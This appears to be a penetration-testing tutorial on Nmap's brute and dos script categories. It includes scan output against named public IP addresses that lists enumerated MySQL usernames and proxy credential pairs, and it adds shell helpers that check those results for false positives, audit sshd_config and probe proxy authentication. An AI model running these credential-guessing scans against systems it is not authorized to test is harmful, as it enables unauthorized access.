

How to use Nmap's brute scripts against a server to discover valid usernames and credentials.


Running Nmap's brute-category scripts against a server you are authorized to test is a quick way to learn more about it: alongside the port and version scan, --script brute runs every script in that category against the services it finds, using Nmap's stock username and password lists. In the scan below the MySQL server (actually MariaDB 10.4, which announces itself with the 5.5.5 compatibility prefix) is exposed to the Internet, and the mysql-enum script reports ten usernames as valid, including a 'test' account, which has no business existing on an Internet-facing database.

Read that output carefully before acting on it. The '<empty> - Valid credentials' wording is just the brute library's report format; mysql-enum only judges whether a username exists, and no password was verified at all (mysql-brute, the script that would have guessed passwords, performed 0 guesses because the server stopped answering the scanner, which Nmap can only report as 'failed or heavily firewalled'). More importantly, the ten names reported are exactly the ten names in Nmap's default username list. mysql-enum relies on a user-enumeration bug in MySQL 5.x servers, where the login error differs for existing and non-existing users; a server without that bug can answer the same way for every name, and the script then reports the whole wordlist as valid. When every guess is a hit, assume a false positive until at least one of the names has been confirmed another way.

Bash
╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.18.27.171)┋ sudo nmap -A -sS 194.169.211.83 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 11:05 AEDT
Nmap scan report for 194.169.211.83
Host is up (0.31s latency).
Not shown: 816 filtered tcp ports (no-response), 181 closed tcp ports (reset)
PORT     STATE SERVICE        VERSION
21/tcp   open  ftp            ProFTPD or KnFTPD
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 8131 guesses in 601 seconds, average tps: 13.3
3306/tcp open  mysql          MySQL 5.5.5-10.4.29-MariaDB-1:10.4.29+maria~ubu2004
| mysql-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
8443/tcp open  ssl/http-proxy (bad gateway)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 502 Bad Gateway
|     Date: Thu, 11 Jan 2024 00:06:27 GMT
|     Content-Length: 0
|   GenericLines, Help, NessusTPv10, RTSPRequest, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 502 Bad Gateway
|     Date: Thu, 11 Jan 2024 00:06:25 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 502 Bad Gateway
|     Date: Thu, 11 Jan 2024 00:06:26 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94SVN%T=SSL%I=7%D=1/11%Time=659F3101%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,54,"HTTP/1\.0\x20502\x20Bad\x20Gateway\r\nDate:\x20Th
SF:u,\x2011\x20Jan\x202024\x2000:06:25\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(HTTPOptions,54,"HTTP/1\.0\x20502\x20Bad\x20Gateway\r\nDate:\x20
SF:Thu,\x2011\x20Jan\x202024\x2000:06:26\x20GMT\r\nContent-Length:\x200\r\
SF:n\r\n")%r(FourOhFourRequest,54,"HTTP/1\.0\x20502\x20Bad\x20Gateway\r\nD
SF:ate:\x20Thu,\x2011\x20Jan\x202024\x2000:06:27\x20GMT\r\nContent-Length:
SF:\x200\r\n\r\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close
SF:\r\n\r\n400\x20Bad\x20Request")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20
SF:400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\
SF:r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(NessusTPv10,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request")%r(Socks5,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request");
Aggressive OS guesses: Linux 5.0 (92%), Linux 5.0 - 5.4 (92%), HP P2000 G3 NAS device (90%), Linux 4.15 - 5.8 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%), Linux 5.0 - 5.5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 15 hops
Service Info: OS: Unix
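
Before treating a mysql-enum result, or any other brute-library "Valid credentials" line, as a finding, compare it with the list Nmap guessed from. The shell below is an added example and not part of the original post: it pulls the accounts a named script reported out of Nmap's normal output and marks the run as suspect when every one of the ten stock usernames (the ten names tried in the scan above) is among them. The first sample is the mysql-enum block copied from that scan; the second is a constructed result naming only a few accounts.

```shell
#!/bin/sh
# Added example: sanity-check "Valid credentials" lines from Nmap brute-library scripts.

# The ten usernames Nmap's brute scripts try when no userdb is supplied
# (nselib/data/usernames.lst); they are exactly the names the scan above reported.
NMAP_DEFAULT_USERS='root admin administrator webadmin sysadmin netadmin guest user web test'

# The mysql-enum block from the scan above, in Nmap's normal (-oN) output format.
SCAN_ALL_DEFAULTS='3306/tcp open  mysql          MySQL 5.5.5-10.4.29-MariaDB-1:10.4.29+maria~ubu2004
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
8443/tcp open  ssl/http-proxy (bad gateway)'

# Constructed sample: a result that names only a few accounts, one of them not in the stock list.
SCAN_FEW='3306/tcp open  mysql          MySQL 5.7.42
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     backup:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0'

# Print the user:pass pairs one script reported, one per line. $1 = script name.
# Every script built on Nmap's brute library prints the same "|     user:pass - Valid credentials"
# lines, so this also works for http-proxy-brute, ftp-brute and friends.
brute_accounts() {
  awk -v script="$1" '
    $0 ~ ("^[|] " script ":")  { in_block = 1; next }   # "| mysql-enum: " opens the block
    in_block && /^[|]_/         { in_block = 0 }        # "|_  Statistics ..." closes it
    in_block && / - Valid credentials[ ]*$/ {
      sub(/^[|][ ]+/, ""); sub(/ - Valid credentials[ ]*$/, ""); print
    }
  '
}

# Usernames only; mysql-enum prints "<empty>" in the password position because it never guessed one.
brute_usernames() {
  brute_accounts "$1" | sed 's/:.*//'
}

# "suspect" when every stock username was reported valid, "plausible" otherwise.
# A server that really has all ten of root, admin, administrator, ... is far less likely
# than a script that cannot tell existing from non-existing names on this server.
enum_verdict() {
  found=$(brute_usernames "$1")
  for u in $NMAP_DEFAULT_USERS; do
    printf '%s\n' "$found" | grep -qx "$u" || { echo plausible; return 0; }
  done
  echo suspect
}

printf '%s\n' "$SCAN_ALL_DEFAULTS" | enum_verdict mysql-enum   # suspect
printf '%s\n' "$SCAN_FEW"          | enum_verdict mysql-enum   # plausible
```

Save a scan with -oN scan.txt and run "enum_verdict mysql-enum < scan.txt". A suspect verdict means the names need confirmation from somewhere other than the script, an authenticated look at mysql.user or a credential that actually works, before they go in a report.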

This is a good argument for checking what a server exposes before it goes live on the Internet. Against SSH the brute category is far less productive: ssh-brute asks the server which authentication methods it offers and gives up when 'password' is not among them, as on the host below, where only keys are accepted:

Bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
|_ssh-brute: Password authentication not allowed

Still, --script brute (Nmap also accepts the single-dash spelling used in the prompts above) is a cheap first pass, as long as you know which script produced which line. The username list above came from mysql-enum, which depends on MySQL's login behaviour; nothing in the brute category does the same for SSH, where ssh-brute only guesses passwords, and only when the server offers the password method. The wordlists can be swapped with --script-args userdb=users.txt,passdb=passwords.txt, and brute.firstonly=true stops guessing a service after its first hit, which keeps the noise down against a production host.
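
The server-side setting behind the 'Password authentication not allowed' result is PasswordAuthentication in sshd_config, but it is easy to believe password logins are off when they are not. KbdInteractiveAuthentication (the deprecated spelling is ChallengeResponseAuthentication) defaults to yes and, with UsePAM yes, still produces a password prompt through keyboard-interactive, a method Nmap's result says nothing about; and sshd uses the first value it obtains for each keyword, so a later 'no' does not override an earlier 'yes'. The shell function below is an added example, not from the original post: it applies those rules to an sshd_config read from stdin and reports whether either password-style method is still enabled. The two config samples are constructed for the demonstration. On a live host, sshd -T prints the effective configuration and is the authoritative check.

```shell
#!/bin/sh
# Added example: audit an sshd_config for password-style logins the way sshd reads it.
# Rules applied (sshd_config(5)):
#   - keywords are case-insensitive and the first value obtained for a keyword wins
#   - PasswordAuthentication and KbdInteractiveAuthentication both default to yes
#   - ChallengeResponseAuthentication is the deprecated alias of KbdInteractiveAuthentication
#   - only the global section is read; everything after the first Match line is conditional
sshd_password_methods() {
  awk '
    BEGIN { pw = ""; kbd = ""; in_match = 0 }
    /^[ \t]*(#|$)/ { next }                       # comments and blank lines
    { gsub(/=/, " "); key = tolower($1); val = tolower($2) }   # allow "Keyword=value" too
    key == "match" { in_match = 1; next }
    in_match { next }
    key == "passwordauthentication" && pw == "" { pw = val }
    (key == "kbdinteractiveauthentication" || key == "challengeresponseauthentication") && kbd == "" { kbd = val }
    END {
      if (pw == "")  pw = "yes"                   # sshd default when the keyword is absent
      if (kbd == "") kbd = "yes"                  # likewise
      printf "password=%s keyboard-interactive=%s verdict=%s\n", pw, kbd,
        ((pw == "no" && kbd == "no") ? "no-password-logins" : "password-logins-possible")
    }
  '
}

# Constructed sample 1: the common "hardened" file. ssh-brute would report
# "Password authentication not allowed" here, since "password" is not offered, yet with
# UsePAM yes the default keyboard-interactive method still prompts for the account password.
WEAK_SSHD_CONFIG='# managed centrally
Port 22
PermitRootLogin prohibit-password
PasswordAuthentication no
UsePAM yes
Match User backup
    PasswordAuthentication yes'

# Constructed sample 2: both password-style methods switched off explicitly.
HARDENED_SSHD_CONFIG='Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
UsePAM yes
MaxAuthTries 3'

printf '%s\n' "$WEAK_SSHD_CONFIG"     | sshd_password_methods
printf '%s\n' "$HARDENED_SSHD_CONFIG" | sshd_password_methods
```

From the client side the same question is answered by "ssh -o PreferredAuthentications=none user@host", whose 'Permission denied (publickey,keyboard-interactive)' line lists every method the server will still accept.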

Nmap also has a 'dos' script category, but it is not a way to run a DDoS: it contains scripts that test whether a service is vulnerable to a known denial-of-service condition, and they may crash the target as a side effect, so only use the category where an outage is acceptable. In the run below the only dos script that reported anything was broadcast-avahi-dos, a pre-scan script that probes the local network's mDNS multicast address (224.0.0.251), not the target 85.190.158.85; it sends a NULL UDP packet to the hosts it discovers (CVE-2011-1002) and then checks whether they are still up, which they were, so they are not vulnerable.

Bash
╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.18.27.171)┋ sudo nmap -A -sS 85.190.158.85 -script dos
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 13:23 AEDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).

A second example, against a host running several 3Proxy instances; -P0 is the old spelling of -Pn and skips host discovery. http-proxy-brute reports every one of Nmap's default username:password pairs as valid on port 1050. Ten hits out of thirty guesses, all of them the stock list, is again a result to verify before reporting: http-proxy-brute decides on the proxy's HTTP status code, so a proxy that forwards requests regardless of credentials looks exactly like a proxy with ten weak accounts. The same run also shows the proxy on port 3000 going silent after the first connections, SOCKS4A services on 1051, 3001 and 8001 whose banners Nmap could not match, and two ports, 9100 and 9101, that it could only guess at as JetDirect.

Bash
┏jcartwright@jcartwright-System-Version╼╸╸╸╸╸╸╾
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◉:~$ sudo nmap -A -sS 46.8.57.209 -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 14:59 AEDT
Nmap scan report for 46.8.57.209
Host is up (0.34s latency).
Not shown: 560 filtered tcp ports (no-response), 430 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
1050/tcp open  http-proxy  3Proxy http proxy
| http-proxy-brute: 
|   Accounts: 
|     root:root - Valid credentials
|     netadmin:netadmin - Valid credentials
|     user:user - Valid credentials
|     web:web - Valid credentials
|     guest:guest - Valid credentials
|     sysadmin:sysadmin - Valid credentials
|     administrator:administrator - Valid credentials
|     webadmin:webadmin - Valid credentials
|     admin:admin - Valid credentials
|     test:test - Valid credentials
|_  Statistics: Performed 30 guesses in 5 seconds, average tps: 6.0
1051/tcp open  socks-proxy Socks4A
2200/tcp open  http-proxy  3Proxy http proxy
3000/tcp open  http-proxy  3Proxy http proxy
| http-proxy-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
3001/tcp open  socks-proxy Socks4A
5500/tcp open  http-proxy  3Proxy http proxy
8000/tcp open  http-proxy  3Proxy http proxy
8001/tcp open  socks-proxy Socks4A
9100/tcp open  jetdirect?
9101/tcp open  jetdirect?
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1051-TCP:V=7.94SVN%I=7%D=1/11%Time=659F67AF%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"\0\[\0\0\0\0\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3001-TCP:V=7.94SVN%I=7%D=1/11%Time=659F67AF%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"\0\[\0\0\0\0\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8001-TCP:V=7.94SVN%I=7%D=1/11%Time=659F67AF%P=x86_64-pc-linux-gnu%r
SF:(NULL,8,"\0\[\0\0\0\0\0\0");
Device type: general purpose|storage-misc|WAP
Running (JUST GUESSING): Linux 5.X|4.X|2.6.X|3.X (89%), HP embedded (85%), Ubiquiti embedded (85%), Ubiquiti AirOS 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:ubnt:airmax_nanostation cpe:/o:ubnt:airos:5.5.9
Aggressive OS guesses: Linux 5.0 (89%), Linux 5.0 - 5.4 (89%), Linux 4.15 - 5.8 (86%), HP P2000 G3 NAS device (85%), Linux 5.3 - 5.4 (85%), Linux 2.6.32 (85%), Linux 2.6.32 - 3.1 (85%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (85%), Linux 3.7 (85%), Linux 5.0 - 5.5 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 15 hops

A proxy that apparently accepts any of ten stock credential pairs, SOCKS proxies on three ports and two JetDirect-style ports on one Internet-facing host is exactly what a penetration tester wants from a first pass, provided each 'valid credentials' line is confirmed by hand before it goes in the report.
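
When every stock pair comes back valid, the quickest confirmation is one proxied request with credentials nobody could have configured. The shell below is an added example, not from the original post: it builds a proxied request by hand, an HTTP CONNECT carrying Basic credentials, and classifies the reply; 407 Proxy Authentication Required is the proxy's way of saying it checked and rejected the credentials, which is what any proxy brute-forcer keys on, while 200 means the tunnel was opened whether or not anything was checked. The proxy hostname, port and tunnel target are placeholders, and the two reply samples are constructed.

```shell
#!/bin/sh
# Added example: confirm an http-proxy-brute hit by hand instead of trusting the script.
# Hostname, port and the tunnel target are placeholders; the two replies are constructed.

# Build a proxied request carrying Basic credentials: an HTTP CONNECT through the proxy.
# $1 = user, $2 = password, $3 = host:port to tunnel to.
proxy_connect_request() {
  creds=$(printf '%s:%s' "$1" "$2" | base64)
  printf 'CONNECT %s HTTP/1.1\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\n\r\n' "$3" "$3" "$creds"
}

# Read the proxy's reply from stdin and classify its status line.
#   407 Proxy Authentication Required  -> the proxy checked the credentials and refused them
#   200 Connection established         -> tunnel opened: the pair is valid, or nothing was checked
proxy_reply_verdict() {
  if ! read -r proto status rest; then status="none"; fi   # connection closed without a reply
  case "$status" in
    407) echo "auth-enforced" ;;
    200) echo "accepted" ;;
    *)   echo "other:$status" ;;
  esac
}

# Constructed replies for the two cases worth telling apart.
REPLY_AUTH_REQUIRED='HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm="proxy"
Content-Length: 0
'
REPLY_OPEN='HTTP/1.0 200 Connection established
'

# Offline demonstration with the constructed replies.
printf '%s\n' "$REPLY_AUTH_REQUIRED" | proxy_reply_verdict   # auth-enforced
printf '%s\n' "$REPLY_OPEN"          | proxy_reply_verdict   # accepted

# Live check (needs network and nc; not run here). A username nobody could have configured:
# if this comes back "accepted", the ten stock pairs were never authenticated either.
#   proxy_connect_request "probe$(od -An -N4 -tx1 /dev/urandom | tr -d ' \n')" nonsense example.org:443 \
#     | nc -w 5 proxy.example.net 1050 | proxy_reply_verdict
```

An 'auth-enforced' answer to the random-credential probe means the proxy really does check credentials and the ten hits deserve a closer look; anything else means the script was measuring an open proxy, which is the finding to report instead.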

